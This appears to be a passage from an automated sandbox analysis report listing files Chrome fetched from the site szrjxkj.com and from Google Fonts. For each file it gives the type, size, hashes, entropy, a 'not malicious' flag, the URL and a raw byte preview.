            Preview:...........(....PNG........IHDR.......e.....ju......sRGB.........gAMA......a.....IDATx^.=..6.F.0."U.`.JJo![.......x.^..4..v.*]...S..HA?..)Qo.....'.x.'..yzD........?.s8...8......7../..P.G.........~'iT...$.B.W..\...S..\...... B....!.E..`w!....J........I........%...\.W.@5.@....+A... B;..+@`..@..\.g...*.........."..B8...Z..yA....._.I"e\.g...@.p.p.Q........4...\...S.......r..[..7O..*...D..{B.*.u!....Y.....-d..2[.W...58t..D_..H...Bkp.n...z.."...V..&..}.........=!.......8........t.g....RP.....T..6.....k..a.8.J....9....C.8...P..j)..$P...R.D&.[`w!..c..@d5PsT>.+....9...5.h.@.y..l.GT..6..}..P%..g.y.$./>.t.X.*....}.....d;8C..Lh.$....K.C3Np.fB3&.....A...g.H.....n..^..,}.....J...W...........U!P....6su.....W.sp.|. +..W.'.....,p..B......1t...Z.a. ....5u&e-........P.m.. ....h......T.........Z....ob...r.U].-..c!...."4m..[_j.....8...T..Y..E@......fB.M.`.$....n...<G.....$..-....@....63.\.......e...P.........8...\.W..l.,n..].g.@.D....83..P!......C.@;..+A..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 8638
            Category:downloaded
            Size (bytes):3777
            Entropy (8bit):7.9522994707668575
            Encrypted:false
            SSDEEP:96:Vjooeqo16r5qtWo0E0tGak2FNtbcwAKfEdgi58Vn:VjBe7125qtWdhwaB7fEdgh
            MD5:51EBC98E4A22538C330902A97C42653C
            SHA1:9625F5C2828CEE88812EAF3F2B1E4B719C666D01
            SHA-256:9C10A751C97BFA26CF4B21FDC6934DD292DD24047905ECCACCDA9F42B250BC8F
            SHA-512:C3CA4035B56B04C61B59E6AD3212E466FF6EB5E8304BA0E333DEDCF7EA7CC94AA87CFAE52F282FFF73A2EA7448A125EE7D80EB31532A905FD85C9D1F2A5B4B67
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/js/modernizr-3.6.0.min.js
            Preview:...........Z.s....3..(tGC. ..>.^iqUYMw....vg..f(...S.B@..I...../..tnv6"^..y~. g.w..Jd........s.l.Q+.r.fI...w........4f..gg..0V..Dm.LE...k...*2..5.b.mV.ii.L.dnt....z./St...u..M!.k..F....Z+mV.$....oR.u.ki.[9[d..V..L|nU. ....Hm..Z..9O..l.iK..../;...1.6....q.i..D!.u..A_.W..Lj......o..Knx..WPO.+$n.{.y-..B.s..(?.=F.g.r.S.y4.....Kso..s........G..y.. ._..=7b2.....Jv.......];4...b...A.Yjm%...a...~.+.d.0. .3..|...bY9g..zA.w.KEz.....R....U,a..:.``.Sl..(.-Rl.....<.:..,5>.Y./...6...y.M...........#.!.<&!]*..(...SB..V..c...ll~A..|.$..c...>.zQ....3|..F#R_:.0.6....R....c.........36.><A.F.p.q.=.ZG.W.<.e./....*...\.{Z...........=:.....`..H.r.E..........~`.....Vv#R.....h.,.N..?.Z7.....+L.H;..u..}..a........d;2...<.v..s.%..2.r'.<V.!.)..R)..|Z.......(..7RBa.R.8...D..u.....7`a........W.[:l..?.:l..:l;...;B...;.a..n.......=..ZZ\4Z...T...b!..<.r..e...F....3a\...w.d.1....Xll,.I.....G(...o8......n..oCU,.~8???.......F.u......"f..&.S.....".F.v.0.....<z..s....RQ
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 55783
            Category:downloaded
            Size (bytes):17039
            Entropy (8bit):7.987305047563484
            Encrypted:false
            SSDEEP:384:XqJNiZ4jGvOVviuly7PJZpcVfK2VteeXYTSUUMNrWHVHw8x65XvSC:XqSSoOBiuaPJodKdeoWiNr4Px65fR
            MD5:E3C8192B496AF38A02558D946B350DA9
            SHA1:3CB7A19C8E4F5FB8807B7AF87CCC7EC2771CF9F2
            SHA-256:136FD45A456E6ACF36855119E484D25BC099A764FBC7B04F6DFB2645F848DD9F
            SHA-512:8E0B6AB293E1CE5C35038F3F33C9502E033D8E2B77842A5C0BF92D99C9C6E6674768436C8AC865604CAD0248B3A000EF1DBA3D31A813EDAA7C4EADA913C523A9
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/js/bootstrap.min.js
            Preview:...........}kW.F........&.w...I.....c......aX.. ....j..8..}..JU.@;39....U*.u..]O.<........<.I1.G....../w.WE1..<}z..g.e.<.~./6...8..*:_/-//.u......iq..'NSiq5=.F.Og.......j..<.qz6-.v...'.$.t.. .w^m.....0?{z.O.d.tg{ck.pK.{...]L..".n.&.. ?{...A..7.$..$.G........E.%.`.....a..t.V8N>L.q..F.h....&A.,|.a..o.^o%0...I....._...g.8...i7.....{%..}....}X..y....'.w.-..I..w.^b..I..n....y.Ie9..q.c<.d..j.,....Z...z.T.F.qv....lz...a...wws.a.M......[....p..i.I..i..8-...^..;...sL...p....&L{..v...e..n.I1.g.d~....y...ae..P),....wk&WD..x|.)d..L.0..G.t8..l...d.}X.z'.....t..-..8D{.23...|...&QB+u...j...E:.4w..K...f29..#........}....>.b+>........j..a.....8..gX..]....l.J..0..=wa.....=..`....{...~.M....x.,V7.X..a....".{.p.].._>P..V.\.E..\6I..'...}`...$...Es.:.K>C.>......w.....vO.v7...7.U8I...:.E..xyww....L.Gv.[...pp....Fy...}..g.. .4...\qA..{.X............A~..n..s..>...&.......^.y....a2.I../.............@}...........^t...O.t...`..7W........U.([.h.0. 0P..mG.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text
            Category:downloaded
            Size (bytes):148
            Entropy (8bit):4.3516667792216674
            Encrypted:false
            SSDEEP:3:qLzLURObOb0qHXbvxL4AqWrKb0GklITULLP61IWKBc4NGDFV:qLzLIkObRHXLx0AqWObtklIgLP8IWKqz
            MD5:630E1F9FEF1A483FE84154E2D0D046DF
            SHA1:F10E0CF39FB920A438116CAAEA80A71E0DCDC162
            SHA-256:9CAD3CFF676946810A81047247F12E4E51FACCC01DF4134EDFD871AEE8BA0956
            SHA-512:33F8257B60C25704F0856806337C13E8AFE964C5B075D80F15ABD87FFA59FF0329F12DE0C4B5978D4640D5B70C0A997C0C239F422D4DA5BBDCB3727C281CFCDA
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/favicon.ico
            Preview:.<html>.<head><title>404 Not Found</title></head>.<body>.<center><h1>404 Not Found</h1></center>.<hr><center>nginx</center>.</body>.</html>.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 2335
            Category:downloaded
            Size (bytes):2363
            Entropy (8bit):7.807289468553549
            Encrypted:false
            SSDEEP:48:X2AFXuePox9DfVOWZiwXlVp4t7mJQG1bfeeumRxgyivhYkkuRB:GAs8ADdOWQwVVp48JQG1bfee9Rxgyivr
            MD5:E7598345E83BC00E0C4ADB3F5527FE55
            SHA1:24FED9389C1D9FADB6C70CDCC7214BC5B1054049
            SHA-256:B765CECFCD83564872CC76027104222DDD403AC16524C8C1A142228CBA674B08
            SHA-512:FCEEFE05F9B650E69853E7C617879AA927CD328E9CC671DFB7EE12B298F9D6908242E5CB6C048627964D92EDD863B6D21D3E554ACC1363164DBB6438E4B97675
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/images/logo-footer.png
            Preview:...........(....PNG........IHDR.......e.....ju......sRGB.........gAMA......a.....IDATx^.=..6.F.0."U.`.JJo![.......x.^..4..v.*]...S..HA?..)Qo.....'.x.'..yzD........?.s8...8......7../..P.G.........~'iT...$.B.W..\...S..\...... B....!.E..`w!....J........I........%...\.W.@5.@....+A... B;..+@`..@..\.g...*.........."..B8...Z..yA....._.I"e\.g...@.p.p.Q........4...\...S.......r..[..7O..*...D..{B.*.u!....Y.....-d..2[.W...58t..D_..H...Bkp.n...z.."...V..&..}.........=!.......8........t.g....RP.....T..6.....k..a.8.J....9....C.8...P..j)..$P...R.D&.[`w!..c..@d5PsT>.+....9...5.h.@.y..l.GT..6..}..P%..g.y.$./>.t.X.*....}.....d;8C..Lh.$....K.C3Np.fB3&.....A...g.H.....n..^..,}.....J...W...........U!P....6su.....W.sp.|. +..W.'.....,p..B......1t...Z.a. ....5u&e-........P.m.. ....h......T.........Z....ob...r.U].-..c!...."4m..[_j.....8...T..Y..E@......fB.M.`.$....n...<G.....$..-....@....63.\.......e...P.........8...\.W..l.,n..].g.@.D....83..P!......C.@;..+A..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):3200
            Entropy (8bit):5.323910578749177
            Encrypted:false
            SSDEEP:96:QOLEJc+ukOLgN/OgBJc+ukOgsN/OxTqJc+ukOxTdN/OCxJc+ukOC8NE:NASmxVrCwbBbP
            MD5:CEF19DC54F42AB168B77A513261767D8
            SHA1:2D1FC2AD85640F7F4E92A7E96B7C9E4027BB1D00
            SHA-256:2A21242A6F1802459B4C1515FD4AE9ABB4CD9F5F887F91D3549FAA1EF1C9537C
            SHA-512:88C1AFAA3B4B2590FD9F3E481E6C70FF90F2850A57A6DA0CC46B8D11AA19F54C5C520CC6FB45C71663BEF3C7EADDADB0B19327D62CA442C4F533414386C17522
            Malicious:false
            Reputation:low
            URL:"https://fonts.googleapis.com/css?family=Poppins:400,500,600,700"
            Preview:/* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/poppins/v22/pxiEyp8kv8JHgFVrJJnecmNE.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/poppins/v22/pxiEyp8kv8JHgFVrJJfecg.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 500;. src: url(https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2) format('woff2');. uni
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 202160
            Category:downloaded
            Size (bytes):67823
            Entropy (8bit):7.996395602768145
            Encrypted:true
            SSDEEP:1536:BSPQ8wVXsWA9PksqwNDPUwgt1BnBOe1fZjnvP4OyS/8cxMIL78:BSPlEa9Pkg5MtHnTxjnvY0t7L78
            MD5:FE0862EB652EFE1EB8B904E9DC2800F2
            SHA1:26BF395E45E70D3058189B4CA068391BFDA43C3C
            SHA-256:9FD94026BEB766ABD9FCD8FD7E72B4E83B387BDFF462DDF917875D5779DE8D87
            SHA-512:0151E5B65BC79C98A893C90A2CF4AA52FD07C1111E8D1D6B06F72FFB4A308621264924FC1EB6F7BBDC159553E8FC0CAEA15F041F5603D26EBE01DF24128268AF
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/js/plugins.js
            Preview:............z.Gv6...g..i@.@R...(..,.3J..b.s....&.$[..4.D....Z....]..} )y..$.....U......7.....6....g..?f..8yzvvzQ.!.J....bq.+%I..._....:[......4?...<....Iu:...-i.<_M..YU..?\.J.E.z........K*;..'..$A..*.PT'.zQ....h.L.9...Uq..%/..$.....r.Te2].\]....*....0...UQ...3...MYV.j..%._...v.,....U...o.r.......|>O..q.(~Ao..y..H.lu!S[.....F.....\.....Aqr....t..dg..6.3...v....w.A.?/.?.|).....Snd.+..e..Wy.X..*.MR.5M&...8..#...X....k...=.w..../.w..=...B[....$.xV.......<..IR.....b..lW}.S....;.'..'}.-.<.`.....H.|u.\^.&=~.b[}{7Y..z...W...uV.d...I..M.#.)[......|.*..yQ]..{.$.e8 .......B.........rY~XqAU.=.....]zY.1;..(.X...l..K.q....uUa..l...+n...$[..p....I..%E.^....T[.Ol..--y.%....n.....(%q.,...-A...B...?...8y.?.$.|Q..W...u...lF....z..c....E.B...0g...7.T.......gv..9hE3M..|..U.n.J6.... ..^p.........,...ev|...9[..&...`dKT.g...<DB"G...$G.].Q.i.^...|j0..=;.........$M...E6..;N0.<...2..............b.2..e8...(A..'S.-'....m=,~.......#.QB.Z..^[.T\f.j.P..8......|.=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 7884, version 1.0
            Category:downloaded
            Size (bytes):7884
            Entropy (8bit):7.971946419873228
            Encrypted:false
            SSDEEP:192:xLFDbKO9E3rS3JWBRO/J601FSS5ZUbik3Zy2f0:pd9J5W501otlI
            MD5:9212F6F9860F9FC6C69B02FEDF6DB8C3
            SHA1:AC6D71B4D5FDD2B3DABC9A06FF6C001E4251DA0B
            SHA-256:7D93459D86585BFCDBB7E0376056226ADB25821EE54B96236FE2123E9560929F
            SHA-512:67317495F4B53E20A9F31C034E456E6C37F387DFFB2C092CAA5159BC441CFCADD02749FFE5BBED1D580D5300A59E48A767EF2C6D9978B474F84C1A2CD095C126
            Malicious:false
            Reputation:low
            URL:https://fonts.gstatic.com/s/poppins/v22/pxiEyp8kv8JHgFVrJJfecg.woff2
            Preview:wOF2..............?....x.............................`..T..L.6..6..6.$..h. ..\....~2.".8. .w.Q.Y,.?$pC.....)bT(i..@X.m...+...D.Q.O.\-?g.U..Z..._...l..!.lKD.Q..>.9v..V..<...Td$.E..,...o..c.t....!...#..8.A..3..cx~n=Di#....U......K.5jXH.].....j.(.6..]{..IDhZ.......R.....[..X".B~.(Su2..../.I.E...T.l%....'.N.aN.2\,7*0.....V.RQ..k~..".1. Lg.zd....}.yyys&D.K.g....)..*..2&%$.nm.\.._.e.tU..I.w;W.|..6..XUv...!......>@.V..'..`.H`...5.7.X.?..@#..:..<.R.|.;K..}.6..IA.C.....z.n.G............[.....z........`.X....D..{<..j...).......FQ..T..m.&s_k[%ZILV.8.l.o.z$.)/]......}..Kg.}..O...o|..>.,U..?..{b<........._.._.06.........R01.@..[......a8..7.V%..B.0F...4 ....q..u#.lg....x....a.=w...8..A6.>f.+.8..Xm@`.m....G.....i..^R}9.aB...?._#.[f.d,V....bG.]...iED.@[.:.....P...........~.{,.x...~.!...C....b.....ze..).:+N....2sd..s..MEp.?^[.k........p..nz...[-.XI.%.."..`..<.2b\.w.VS.a.+......~..J..uGq..)..1...4o3v.Sb......5.w7...-....Wd>..B....R^.4'..B.2G>.en.q..._.@s......
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 66333
            Category:downloaded
            Size (bytes):15720
            Entropy (8bit):7.980460804046335
            Encrypted:false
            SSDEEP:384:X1HM/m82/9Z0p4WYooXbhy6ykaUF+4vPwEVOnPLB09RGEqZ:FM/z2/9uprYBXly6843XOPLeFs
            MD5:F732C4E04EC43D39CB7891268D2BA9B1
            SHA1:7288DE003434A1F348EC41D5161C80CF18C03A4A
            SHA-256:BDEB8C32DD0268D5907148E0184BCBCA58F0AC150A799245483457556DDB0678
            SHA-512:E55502B5FC21556DFE25C982BC9019C9512B8A772807F7C8671A72AAEE666F57AAC582CF7D0F4345A67AEDE5EF9B8E94D0DA30123B1557A365141F6322F51710
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/css/plugins.css
            Preview:...........}......~..i.t.AQ-.R]T......c}....z..%QUtI..D.......G.G.'./...$#U..g.3=....DFFF|....,....G...l..c...J~Wn.Y...n.R...............?.._.....f.>.......h.l>-.M...?...O...T...z...V>W..r.....'...M...=.....V..n....X.e.XWxwY...(.u..W..!yi.I.$.}E.+.yU..zu\.?.T..u[..Q.[T.._..M...}.K.'.|.%h&j.V.6..j.@.F.(.Z..f.Wn..(...X._..<.....m....._...f?K........i......$..yp..p|K.`...O.%.B..E.5...j.m.*....^..<..._....h..>.'..i.O?...u....U....7.f^-..2mv.}.U._.?5.U./....w.Qh......Z...>...k....[.[OU}w..&....}YW.-5w...M....S..0! 2gxa.P.....^T.~....C....?~<NT..?-...../.IVn..o.<+Wm....+.Z...._.k.:..+....:`.....y.[.P6w.u.j...?y.HV3W:........l<.&.U..J..u.^..,...u.]..S.y..o..;.A.Z..*7*j....yVa..v.k.u......I.]..E....;.x..}..o.MM3.W.8,J/...X&.Q............fq.$hE...":..?.........~_.kZ...$..8..W..d......U/..>..U{xxI..\>6..a.l......Q~..a.;.Gu..*...Me..c.EJ.o...7...C.7..v%.Q.g..~.........."..?.a.......9w.?.}.,......"=....uY.h\f.v]o.t.n.._"...Zj{-..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 233972
            Category:dropped
            Size (bytes):227058
            Entropy (8bit):7.995821348447364
            Encrypted:true
            SSDEEP:6144:Czwz9bUDkbiP2Gft53FatPQdYH1GRyvVD3c3oC80NUHO:CUyAWPZ16PQY9S3I0d
            MD5:FF86C3AFA73A83889EFA823CE47F0FBC
            SHA1:A0818A215634887F352F7717F3293770929ED502
            SHA-256:8EFE8928F1468A41F3698EC3AA7A7DB27AA2A2B28BB1128F98A34B674D9898C4
            SHA-512:04D51DB075B6BD8C0B755414859C4AC6F849625A2ADE194DEEA86321D1FEA70EAC1A3F733118E4FA47A6B6D14ABCD39CF34B3C678B9A8F585D37DB45AA14932B
            Malicious:false
            Reputation:low
            Preview:..........d.wT.i.=......... M@........T.PD.(-".....E.......H...ABs....!.P.B....[.3..........g.....c{;..1.1.. q.......D.@``.0.....4.K.q..,.zH.'......k...S......Z/.a}=.s.....P...,EQ..i-..@..|jVxp...g/.O.)...)+......>..R%.Ny4a...H...(.j..*%.v...;.5{.G.........v.a....;.,..&..................i.[.)..sqr.;.....wb.=..d.i<.......~..v..........W.V....(.9U.F5......}y..:P.f:qh.u...&R%.fLUo{.Qj8.2x. ..6H...l...'v.&.'..........3^.6.e..A...+...a.eo..c?i.....5...bZ.SO.,"..q...'}.H.W............/....*.U..!boY.F.[.@.+.S..T.!...H....p.VK..x..9.k.rM@....5.7...3..fiS..*..k..t...`..oc7h.-.+.....t....p.=p.j.5&..A\D|...!..lB..Q.^.q...R..m.[>b|.c..6...c..?..4..rPS.........$.!.`.&...w.i......#.|.....m./.bY..A.......u....'UUzw}.~Jz&g....RP..@........I.;>.......RY...g...k....g...aZ....1;L<.HqO..|(-.....\..`.4....8/.1.....N..........h..&.$hJ(^.w,-...8..p|..5..-G.{2...?.h6d8......B..).5d...r.T.".E..2Gb....9Xz..E.U.E,j.Ut=..AX....=.|(x...af}v.Hc.....'.L.!.Oco5.C...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (1572)
            Category:downloaded
            Size (bytes):27115
            Entropy (8bit):5.279550306614378
            Encrypted:false
            SSDEEP:768:VsrkOIE/9/bpUfY2JSavtpyNSpbJfai0Ydi9+QJEaNPDz4T06JOajptP:DP12md
            MD5:51F31C59320EA042E52C78CE9E898A36
            SHA1:03D1B597435F94A6CD53EE795A7F9F4D376BB88C
            SHA-256:9111CF5E51128FED5EB7F10BACFE36215E433F553294563909DDD3C63540FDD1
            SHA-512:C6B761B5F6F51063D04D87C4D4DD23BE717385460A555F70708C91D8584B8A6CB912E0866FBCE97F70492B29B1D6C602263BB1ADD92041D63DD535783C5CA104
            Malicious:false
            Reputation:low
            URL:"https://fonts.googleapis.com/css?family=Roboto:300,400,400i,500,700"
            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAX-k2Qn.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAz-k2Qn.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLoHQuAT-k2Qn.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: '
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 7748, version 1.0
            Category:downloaded
            Size (bytes):7748
            Entropy (8bit):7.975193180895361
            Encrypted:false
            SSDEEP:96:0g6vAF/FXh6MmoI56TEwosGU/DbVF/QBT1gaHEYT6u/w3hXLbJPAS772+6haAftj:zp6x6TYpoDYBJg8TRkbJPAS/2+CzQa7
            MD5:A09F2FCCFEE35B7247B08A1A266F0328
            SHA1:0DA2D17E738F46D2A09E6FB7969DA451719A9820
            SHA-256:CD36DE204ACA2D5FA263A731F7C20009B5E3D754BA1F1E03C33E93A48F3E7446
            SHA-512:5E3F9A298003B84250EC6801E08AD2A4FF8845D4C3E13EA61BEC37DA24D26EDE13B436257882124CC0C27E9A323BA92E7D23C6AD3F48A7B75535F5ED98813A0E
            Malicious:false
            Reputation:low
            URL:https://fonts.gstatic.com/s/poppins/v22/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2
            Preview:wOF2.......D......?p.................................`..T..0....6..6.$..h. ..H....82EF.....E...........W...b.....b..l...Qc/.....G4.]Rc..C...9J....>W..A.#..~.$.-.....}.......$-.........B1..;<....=.FO... R..%......9.E.s..M6.k.-_.^.?...._...lI..59Y.f|..&..J..<8....e.zip".......q...u.?Y.....I.:MA.d.Y....0>..E.....a...H...:.....A.j.h.P.......A.+.l/j........d....r)Y>..V..@E\Q.k.E..(....6..yf.)s..O..z..........`Q.La'N.t V$.. t".ZDb......U.A.........p~.TW.K....y..^.(.;....K.TO.l... {s..M$ ....!....a..^.y...._...H..e.lKD.#..9.$...!&.19.9I..R-..b...TD&...j...xol.[...~.!.q.%..M..>...k.K.{5......+..U....34........[R.GZF.s}&...#g.P..Y..zF..-&..Y.i.3...I_3..Q.....`i....F{.z..>0....N...16.i.@.........5D3..>.._o.0M+5qI.ds..o...1v.!zx..T..b.w.:.....z$...s..x...v...e.&.[.qb.P..Gt....D.3.. ..W.^f.C(...t..`.|..0.Z.C|..)...0....Y.Q...m.k...-VmS..6p..%7.o(0p..4..S7..i\.....v.k.+S)J....+..../....xv.9.W..nR.CG..f..|....Y...'W.....|b<.wN@....-[....l.P4#..=...[
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 38384, version 1.0
            Category:downloaded
            Size (bytes):38384
            Entropy (8bit):7.993871314529971
            Encrypted:true
            SSDEEP:768:FQ+usUhhv0N8qSRCjPCyloYRNcIsTh38i8/3V93ut0f:FQlsUhtYLBl/nGpUvI0f
            MD5:A4D31128B633BC0B1CC1F18A34FB3851
            SHA1:6EE4C79372C3FD679706306EDE47E4B03CF53D60
            SHA-256:E8EEA96E29A7C0A72612AB85CA3229979666467A28349642C2176E7189A1A39C
            SHA-512:C129C0CB100FEEA6D00B739D1CDE2A7362B2F45F38DA3E4C949193F40E59ABC9C387ADA4BB230B00FD62E137409E18DEF7C1636E1CD463F8070106E8B7E21D48
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/fonts/Material-Design-Iconic-Font.woff2?v=2.2.0
            Preview:wOF2............................................?FFTM..`..B.......<..c.6.$..0..... ..A...?webf.[.:.B..v...H..6-...........~W..ha....c......&.1.m.. .Y.W.?..pTA...X..>..N;ih..F..B|..M..pA.+:....:.V..(.J^.gu\Bg.....M&.....H....F..bV....RmcUMQu&+.)p....pk..h..q....;.....Mx.x9.p...}..^.2Eg...f[....c..^..3...P.1.5...W.~.s..(.3..9..T*?.....}.?y....R2...~.....V<..7.Zi.B2.bQS".O......p.=06...`..K05C1.......E..,..I..4j..>Zg.|.d...;.!0...;.?O......:!....E ..M.*[....B...(..X&*....K5.{B...m.Ll._.B.j..]..F..>....m.......C4g.J6..l..%.(R4Z.%...Z. .#pP...m.=k.Q5.G{..?5...._...^.......@.3..E..=...... ..:...Tm...u.. .f2B....)*t.3...:.@...d.....gT...q...q...F.........s.Ry.2.9.?...f.np...R:..w.h.,........+......B....2...r..."c...g4YW....6.......Bx.l....Xb.%q...=ECY.G.......Qr......;{.!.w.........KX..:@.N.. .Z..L.....Q..~.H.uK .y.Oq.9._C>x....}.Xh..FV.%..H.[cR......H.......N.3mJ.-ep^.#.".B&f...t.~.p...(...%pUPQ.Fw.2;.;..-.>.{.a...s.Fz9.h.....D\..U......u..(#.....'..=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 34872
            Category:downloaded
            Size (bytes):13165
            Entropy (8bit):7.982751514659293
            Encrypted:false
            SSDEEP:384:+hTP2MmUIV0Nk0chjaZsiEOeJ0eGVBkpG3/D:pUDVcMtCC9kyD
            MD5:8E064C5D9354657E803B918FBE756DBF
            SHA1:884453C99BB7FD691A9C6EFF163D68AEAEEBE586
            SHA-256:98A98890E8EE29E9ED5907E5ACF835FB1602DC4EDD896B2F544342343475FBC4
            SHA-512:BF7BA20990F68717D2DD1C52C5059683A157063DD6B1FC99E09D07439917F458182F254DAED6DCEEF6245A235952F5E66F10953215AA4A237E0A565859116F65
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/dongtai/8622.html
            Preview:...........}Y..F....W..4#S..>....i.gvm.W.#..5[.4 ...... O..")..7u.&.C...Q..w....'3...'...#....H.[.k.+..T...p....=..7..}......R..n-.[...j).qp..\..w..h..R..R[..T.T\O.......2<..2}...w{V....BOY.9..[jK..9......5C...-../._..zq~r.........s.>.h..SG.k.~....|.rr..........|.}.U....../........./M.<.......'./^,-r.1.m......G....Mag.qW.q_..n..N.....>.&xzh.j1>jnT..ku|.c......./.@......Om=........z......._.O...~}...|~z..5x,..'8.xr.^.....o.^..Q..c.].S..V\?...X....`$???........S[.w&.>.....a../J.B/q.B_[OO.g...z..=Md#...s.k?.Won?...lm..~.U..q|..r.o...1..,.7.jz.....e[.........f.Ky.k....Y.[.A.....WS..:..3..Z.OY `.S....._.+.c....W.fa!...c...oA.S.[....J.j..O......w.K...<.....R..b..Cn...{.q......... .5.....An..\:.^..g.W.?J..~A.?j....D....X..k.&.|..B..o *.....^.q......*..m.>.W...k^.z....a..EF.}K..............n4...OY........R</.-^&p....`...{WWd#t..>.5.;.q..._Z....}...............u..{.Uk......9..k.1.._wg..}.u.).e.....mo...<....kNk.e,...[.mm.B.T.t'........r.G..k...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (7104)
            Category:downloaded
            Size (bytes):7110
            Entropy (8bit):5.807347902243564
            Encrypted:false
            SSDEEP:192:zfFd66666IAq3FNg56XzvUkD/oEPhk46vjE33aC:zr66666+0567UkfPher+
            MD5:C5A05800FF42302864A7B4B28A209EC2
            SHA1:37CC17EE113AC0D9DDB7CB445EE44F21E079FBC4
            SHA-256:889B60D640D035C9578F1E564266B3F37A88F761EE7802623B29E9505D1D9FC1
            SHA-512:E65E136059D381D275126D34BEC76F2E6F09758E5F1E771FB9EE3AD896B412F88FCDA90E10DCDA8C1351A4F4FA17C8EC73BC3DAF36505CA6B59CD07463E37054
            Malicious:false
            Reputation:low
            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
            Preview:)]}'.["",["usaa data breach settlement","boston bruins brad marchand","wwe nxt","niantic pok.mon go","nvidia stocks","nfl draft free agency","severance episodes","nasa spacex crew 10 